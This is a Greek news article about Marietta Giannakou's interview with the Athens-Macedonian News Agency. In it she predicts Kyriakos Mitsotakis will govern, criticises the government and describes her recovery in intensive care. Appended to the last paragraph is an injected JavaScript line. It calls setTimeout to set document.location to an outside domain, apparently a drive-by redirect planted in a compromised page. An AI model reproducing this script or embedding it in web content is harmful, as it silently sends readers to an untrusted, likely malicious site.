Γιαννάκου: Ο Κυριάκος θα πάρει σίγουρα το τιμόνι της χώρας

0
13

 

Την εκτίμηση ότι ο Κυριάκος Μητσοτάκης θα έχει την ευκαιρία να αναλάβει το τιμόνι της χώρας διατυπώνει η Μαριέττα Γιαννάκου στη συνέντευξη που παραχώρησε στο Αθηναϊκό Μακεδονικό Πρακτορείο Ειδήσεων.

Η πρώην υπουργός, και επί σειρά ετών βουλευτής και ευρωβουλευτής της ΝΔ, εμμέσως πλην σαφώς αφήνει ανοικτό ακόμα και το ενδεχόμενο της αυτοδυναμίας για τη ΝΔ, χωρίς ωστόσο να κάνει εκτίμηση για το χρόνο των εκλογών.

Λέει μάλιστα ότι θα έχει και η ίδια ενεργό ρόλο ξανά στην πολιτική και τονίζει πως το πρόγραμμα που εξήγγειλε ο Κυριάκος Μητσοτάκης στη ΔΕΘ είναι εφικτό και πως «τα ολίγα που υποσχέθηκε μπορεί να τα κάνει». Παράλληλα, ασκεί κριτική στην κυβέρνηση, λέγοντας πως λειτουργεί με σοβαρή αμφιθυμία, ενώ ανεβάζει ακόμα περισσότερο τους αντιπολιτευτικούς τόνους, με αφορμή την υπόθεση των αδειών των τηλεοπτικών καναλιών.

Μιλώντας μάλιστα για την πρόσφατη περιπέτεια που πέρασε με την υγεία της και ανοίγοντας την καρδιά της για όσα σκεφτόταν, ενώ βρισκόταν στην εντατική λέει χαρακτηριστικά: «Σε όρους επιβίωσης, η σκέψη μου ήταν στην κόρη μου από τη στιγμή που συνήλθα όταν βρισκόμουν ήδη στην εντατική. Και βέβαια, είναι οι αντοχές του οργανισμού, τις οποίες δεν δημιουργεί κανείς μόνος του. Είμαι ευτυχής που τα κατάφερα. Ήταν μια σοβαρή περιπέτεια αλλά τώρα είμαι καλά.

Τώρα, αν αναθεώρησα κάτι… Σε όρους καθημερινότητας έπαψα να καπνίζω. Σε όρους γενικότερα ζωής, δεν είχα λόγους να αναθεωρήσω, διότι πάντοτε είχα συγκεκριμένες απόψεις για τα πράγματα και δεν χρειαζόταν η ασθένεια για να με κάνει να αναθεωρήσω. Είχα, ήδη, όχι αναθεωρήσει, αλλά τοποθετηθεί έναντι πολλών ζητημάτων από πολύ νεαρή ηλικία» καταλήγει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here